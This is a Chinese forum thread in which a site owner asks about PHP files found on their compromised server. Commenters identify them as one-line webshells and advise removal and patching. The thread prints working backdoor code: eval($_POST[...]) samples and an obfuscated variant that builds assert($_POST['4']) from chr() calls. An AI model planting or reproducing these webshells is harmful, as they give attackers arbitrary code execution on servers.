PHP-网站多了几个PHP文件,eval($_POST['1']);
网站多了几个PHP,内容如下:eval($_POST['1']);
有的是其他内容, 我百度了一下发现时执行某些命令的,我测试了一下 如果权限没限制好的话 确实可以执行一些命令。 请问 除了设置权限,从代码级别可否做限制呢?有没有什么好办法呢?
还有个PHP文件内容如下:
<?php
$a=range(1,200);$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a[113]).chr($a[115]);
$b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr($a[51])]);
?>
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(4)
先删除多出来的文件,然后改下服务器账号密码,再去检查下看是不是服务器有什么BUG漏洞什么的,避免被再次攻击
恭喜你,你的网站被挂马了
这是PHP一句话木马啊.可以写任何PHP代码给服务器执行了.建议修补漏洞.
<?php eval($_POST[hardqmu7]);?>
这段是非常危险的代码,黑客可以在 $_POST[hardqmu7] 放入任意 PHP 代码在你的服务器执行